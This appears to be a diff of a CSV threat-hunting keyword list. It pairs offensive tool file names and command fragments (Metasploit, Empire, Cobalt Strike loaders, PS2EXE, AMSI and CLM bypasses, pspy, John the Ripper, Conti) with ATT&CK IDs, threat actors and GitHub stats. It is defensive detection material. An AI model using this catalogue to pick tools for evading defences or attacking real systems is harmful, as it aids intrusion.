T1210 - 
T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","N/A","","N/A","","","" -"*ps_token2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*ps_wmi_exec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ps2exe -*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" -"*ps2exe *.ps1*.exe*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" -"*ps2exe.ps1*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" -"*ps2exe.psd1*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" -"*ps2exe.psm1*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation 
tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z"
-"*PS2EXE-master*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z"
+"*ps_token2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*ps_wmi_exec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*ps2exe -*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z"
+"*ps2exe *.ps1*.exe*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z"
+"*ps2exe.ps1*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z"
+"*ps2exe.psd1*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z"
+"*ps2exe.psm1*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z"
+"*PS2EXE-master*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z"
 "*PSAmsiClient.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z"
 "*PSAmsiScanner.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z"
 "*PSAttack*","offensive_tool_keyword","PSAttack","PS>Attack combines some of the best projects in the infosec powershell community into a self contained custom PowerShell console. Its designed to make it easy to use PowerShell offensively and to evade antivirus and Incident Response teams. It does this with in a couple of ways.","T1059 - T1112 - T1055 - T1566","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/jaredhaight/PSAttack","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*PSByPassCLM*","offensive_tool_keyword","PSByPassCLM","Bypass for PowerShell Constrained Language Mode","T1027 - T1059 - T1218 - T1086 - T1089","TA0002 - TA0008 - TA0007","N/A","N/A","Defense Evasion","https://github.com/padovah4ck/PSByPassCLM","1","0","N/A","N/A","3","280","45","2021-12-23T16:29:01Z","2018-09-13T07:27:18Z"
 "*PSconfusion.py*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z"
-"*pse2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*pse2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
 "*ps-empire client*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
 "*ps-empire server*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
 "*ps-empire*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
-"*psexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
-"*psexec_ms17_010.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*psexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*psexec_ms17_010.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*PSEXEC_PSH *","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","0","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z"
-"*-PsExecCmd*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*-PsExecCmd*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
 "*PsExecLiveImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
 "*PsExecMenu(*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
 "*psinject * x64 Invoke-*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*psinject -PID*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z"
-"*pslo *.ps1*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*pslo *.ps1*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
 "*pSNIRFgTuZnCdHN*","offensive_tool_keyword","trevorc2","Command and Control via Legitimate Behavior over HTTP","T1105 - T1071 - T1070","TA0011","N/A","N/A","C2","https://github.com/trustedsec/trevorc2","1","0","N/A","10","10","1100","244","2022-01-31T20:16:24Z","2017-10-27T15:59:28Z"
 "*PSObfucate.py*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z"
 "*Pspersist-main*","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0005 ","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","10","1","72","17","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z"
 "*PSprofile.cpp*","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0005 ","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","10","1","72","17","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z"
-"*pspy*psscanner","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
-"*pspy32 -*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
-"*pspy64 -*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
-"*pspy-build:latest*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
-"*pspy-development:latest*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
-"*pspy-example:latest*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
-"*pspy-master*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
-"*pspy-testing:latest*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
